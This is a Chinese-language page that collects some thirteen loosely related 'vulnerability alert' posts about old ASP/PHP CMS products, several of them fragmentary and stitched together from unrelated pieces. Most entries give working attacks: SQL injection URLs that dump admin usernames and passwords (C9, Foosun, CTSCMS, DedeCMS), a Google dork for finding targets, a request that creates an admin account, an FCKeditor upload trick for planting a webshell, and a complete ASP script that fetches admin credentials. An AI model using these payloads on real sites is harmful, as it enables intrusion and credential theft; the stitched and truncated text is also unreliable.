C9静态文章发布系统漏洞 0day漏洞预警

C9静态文章发布系统漏洞 0day漏洞预警（精选13篇）

篇1：C9静态文章发布系统漏洞 0day漏洞预警

看到一个叫C9静态文章发布系统的程序只不过没仔细看过，今天下载回来一份看了下发现了问题在投票那里是一个flash投票系统，flash我不懂于是抓了个包看了下发现是通过add.asp提交投票xml.asp提供rss输出当读到这里的时候发现了问题

代码如下:<%thisid=funstr(Trim(Request.QueryString(“voteid”)))ifthisid=“”thensetrs=conn.execute(“selecttop1*fromplug_votewhereoorcfalseorderbyiddesc”)elsesetrs=conn.execute(“select*fromplug_votewhereid=”&thisid)endififrs.eofthenresponse.Write(“连接数据发生错误”):response.End()conn.execute“updateplug_votesetvotevi=votevi+1whereid=”&rs(“id”)fori=1to5ifisnull(rs(“cs_”&i))thenexitfornextnowid=rs(“id”)......%>

这里我们看下是如何接收变量传递进来的值的thisid=funstr(Trim(Request.QueryString(“voteid”)))trim过滤两边空格然后是funstr这个函数在包含文件里有个fun/funlogic.asp函数应该在这里打开这个文件

Functionfunstr(str)str=replace(str,“<”,“<”,1,-1,1)str=replace(str,“>”,“>”,1,-1,1)str=trim(str)str=replace(str,“’”,“‘”)funstr=strEndFunctionFunctionunfunstr(str)str=replace(str,“<”,“<”,1,-1,1)str=replace(str,“>”,“>”,1,-1,1)str=trim(str)str=replace(str,“‘”,“’”)unfunstr=strEndFunction

这个函数起到的作用就是过滤字符串中的一些字符如<>空格’等等作者可能认为这样就可以达到防注的效果其实不然注入不需要这些东西

127.0.0.1:2936/plug_vote/xml.asp?voteid=1

构造下引用127.0.0.1:2936/plug_vote/xml.asp?voteid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,username,password,10,11,12,13,14,15,16,17,18%20from%20user%20where%20id=1

查询得到管理员用户名和密码后台拿webshell有两种方法一个是上传一个是编辑模板注意看下编辑模板的地址就可以了不多说用此漏洞干坏事者MJJ

篇2：C9静态文章发布系统漏洞 0day漏洞预警

代码如下: <% thisid=funstr(Trim(Request.QueryString(“voteid”))) if thisid=“” then set rs=conn.execute(“select top 1 * from plug_vote where oorcfalse order by id desc”) else set rs=conn.execute(“select * from plug_vote where id=”&thisid) end if if rs.eof then response.Write(“连接数据发生错误”):response.End() conn.execute “update plug_vote set votevi=votevi+1 where id=”&rs(“id”) for i=1 to 5 if isnull(rs(“cs_”&i)) then exit for next nowid=rs(“id”) ...... %>

这里 我们看下是如何接收变量传递进来的值的 thisid=funstr(Trim(Request.QueryString(“voteid”))) trim 过滤两边空格 然后是funstr这个函数 在包含文件里有个 fun/funlogic.asp 函数应该在这里 打开这个文件

Function funstr(str) str = replace(str, “<”, “<”, 1, -1, 1) str = replace(str, “>”, “>”, 1, -1, 1) str = trim(str) str = replace(str,“’”,“‘”) funstr = str End Function Function unfunstr(str) str = replace(str, “<”,“<”, 1, -1, 1) str = replace(str, “>”,“>”, 1, -1, 1) str = trim(str) str = replace(str,“‘”,“’”) unfunstr = str End Function

这个函数起到的作用就是过滤字符串中的一些字符如 < > 空格 ’ 等等 作者可能认为这样就可以达到防注的效果 其 实不然 注入不需要这些东西

127.0.0.1:2936/plug_vote/xml.asp?voteid=1

构造下引用 127.0.0.1:2936/plug_vote/xml.asp?voteid=1%20and%201=2%20union%20select% 201,2,3,4,5,6,7,username,password,10,11,12,13,14,15,16,17,18%20from%20user%20where%20id=1

篇3：C9静态文章发布系统漏洞 0day漏洞预警

2011年5月初, 中国电科院信息安全实验室在例行检查中发现某稿件处理系统存在严重安全漏洞, 上报国家工信部并经国家互联网应急中心 (CNCERT) 进一步检测证实为0DAY漏洞。0DAY漏洞是指该漏洞发现者未公布或由少数黑客掌握, 并且开发商未提供修补方案, 对系统威胁较大的漏洞。恶意攻击者可利用该漏洞获取服务器的完全控制权, 非法获取敏感信息。

5月16日, 国家互联网应急中心通过国家信息安全漏洞共享平台 (CNVD) 将该漏洞详细信息首次公开发布, 并通过国家信息安全漏洞共享平台漏洞通报专刊 (第18期) 向全国进行通报。该漏洞影响范围广泛, 国内受影响的网站有350多个, 涵盖军工、医药、水电、高校、科研院所等多个行业。攻击者利用该漏洞可获取服务器的控制权, 非法获取期刊稿件和投稿人敏感信息。目前, 中国电科院信息安全实验室已向上级主管部门反映了此漏洞情况。该0DAY漏洞的发现, 标志着中国电科院信息安全实验室在安全检测与攻防实战领域达到了国内先进水平, 体现出信息安全实验室为保障电网信息安全、规避安全风险方面的有效监督和坚强的技术支撑作用, 同时, 也充分体现了实验室对国家互联网信息安全的重要贡献。

篇4：C9静态文章发布系统漏洞 0day漏洞预警

测试代码：

127.0.0.1/index.asp?forumID=2&subclassID=1&act=1&classicID=1>“>&page=1

127.0.0.1/index.asp?forumID=2&subclassID=1&act=1>”>&classicID=1&page=1

127.0.0.1/index.asp?forumID=2&subclassID=1>“>&act=1&classicID=1&page=1

篇5：C9静态文章发布系统漏洞 0day漏洞预警

TAYGOD免费企业建站系统是一款开源的免费程序，您可以

TAYGOD免费企业建站系统ASP版是一款基于asp+access的免费开源建站系统，整套系统的设计构造，完全考虑中小企业类网站的功能要求，网站后台功能强大，管理简捷，支持模板机制，能够快速建立您的企业网站。

系统特性：

采用流行的asp+access设计，功能强，实用性高。

代码美工完全分离，维护更方便。

对运行环境要求低，基本上一般的空间都支持此网站系统的运行。

完美整合KindEditor编辑器，所见所得发布各类图文信息。

后台操作简洁，无需专业知识，即可掌控整站。

风格模板机制简单，通过简单的HTML制作即可，后台提供完善的标签调用说明与示例。

后台数据库备份,您可以通过FTP工具将备案的数据库文件下载到您本地电脑中。

一：添加管理员XSS漏洞。

漏洞文件：sourceadminAdmin_Add.asp

漏洞代码：

<%if request.QueryString(“action”)=”save”thenuid=replace(trim(Request(“uid”)),”‘”,”“)realname=replace(trim(Request(“realname”)),”‘”,””)pwd1=replace(trim(Request(“pwd1″)),”‘”,”“)pwd2=replace(trim(Request(“pwd2″)),”‘”,””)password=md5(pwd1)

未进行验证直接写入数据，

漏洞测试:

127.0.0.1/asp/source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=itlynn&pwd2=password

将生成一个用户名与密码为:123456 password 的管理员。

至于怎么欺骗管理员打开，这就需要一点社工技术了。

自己研究吧。

二:留言板XSS漏洞

漏洞文件：Message.asp

篇6：C9静态文章发布系统漏洞 0day漏洞预警

dim sql

dim rs

sql = “select * from [”&CgsailPrefix&“admin] where id=”&request(“id”)

Set rs = Server.CreateObject(“ADODB.RecordSet”)

rs.Open sql,conn,1,1

photo=trim(rs(“photo”))

%>

篇7：C9静态文章发布系统漏洞 0day漏洞预警

注入：

注：上面的datacallname值不是乱码，是编码过的，

再附一个自己发现的后台文件重命名拿shell。

path:

filename:

篇8：C9静态文章发布系统漏洞 0day漏洞预警

中国旅游服务网站管理系统CTSCMS，这个网站系统是我在近期发现的，使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。

Google：2002-2011 CTSCMS.COM ，inurl:users/reg.php旅行社

POC:/plus/search.php?keyword=as&typeArr[111%3D@`'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`'`+]=a

后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用

很多大型旅行社网站都在用,请在法律允许的范围内测试，

保重....

​

★ 智有道专业旅游系统 v1.0 漏洞漏洞预警

★ JEECMS漏洞（文件上传）漏洞预警

★ 米号吧文章管理系统跨站0day漏洞漏洞预警

★ 天空课堂文件上传漏洞漏洞预警

★ 智有道专业旅游系统 v1.6.5 漏洞漏洞预警

★ 腾讯多个unfixed bugs漏洞预警

★ mPDF = 5.3文件泄露及修复漏洞预警

★ WespaJuris = 3.0多个缺陷及修复漏洞预警

★ Joomla! JomSocial组件任意文件上传漏洞及修复漏洞预警

篇9：C9静态文章发布系统漏洞 0day漏洞预警

继续

直接利用就可以拿shell 了，

配置IIS6.0

篇10：C9静态文章发布系统漏洞 0day漏洞预警

xxxx.com/fckeditor/editor/filemanager/connectors/test.html

hbkingco.com//fckeditor/editor/filemanager/connectors/uploadtest.html 这个两个页面，是死的关键，

上传xx.asa;.jpg

上传之后，路径自然出来了。马为xx.asa; 注意，后面有个;

除了2.63.

Fckeditor 基本上每个版本都可以这么利用。

上传不严格。。

篇11：C9静态文章发布系统漏洞 0day漏洞预警

MSF和PHP的那个漏洞除外. 所以日不了。。。

如果有管理平台 DirectAdmin

那么你就能成功

默认登陆地址 ip:2222/

在LINUX下 /usr/local/directadmin/custombuild/mysql_backups 这个目录是用户的备份目录，悲剧的是WWW用户组能访问

如果他备份了，假设他用户是 /home/hacked/domains/11.com/

篇12：C9静态文章发布系统漏洞 0day漏洞预警

风讯的注册页面...

漏洞页面：/user/SetNextOptions.asp

利用方法：

构造注入

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

“admin_name”管理用户名数据库表

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

“admin_pass_word”管理密码数据库表

把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了

DE>foosun cms 0day exploits<%web=request(“web”)id=request(“id”)%>关键字:会员注册step 1 of 4 step

输入地址：<%=web%>“>

要暴的ID号(默认是1)<%=id%>”>ID为1的是超级管理员

<% function bin2str(bin)    dim tmp,ustr    tmp=“”    for i=1 to LenB(bin)-1      ustr=AscB(MidB(bin,i,1))      if ustr>127 then        i=i+1        tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1)))      else        tmp=tmp&chr(ustr)      end if    next    bin2str=tmp  end functionwebuser=web&“User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=”&idwebpass=web&“User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=”&idif web=“” thenelseset x=server.createObject(“Microsoft.XMLHTTP”)  x.open “get”,webuser,false  x.send  str=bin2str(x.responseBody)response.write “你暴的网站地址：”&web&“

第”&id&“位的管理员

”response.write “

网站后台地址

”for i=126 to len(str)mid1=mid1&mid(str,i,1)nextresponse.write “

------------------

帐号：”&mid1&“

”x.open “get”,webpass,false  x.send  str=bin2str(x.responseBody)for i=126 to len(str)mid2=mid2&mid(str,i,1)next response.write “

密码：”&mid2&“

------------------

” response.write “

爆出咯，可以YY了

cmd5”  set x=nothingend if%>DE>

具体的利用方法请参考源码，

风讯CMS 0DAY exploits漏洞预警

篇13：C9静态文章发布系统漏洞 0day漏洞预警

DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等

看到微博上有人提了下,偶也发鸡肋了.

bt/de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28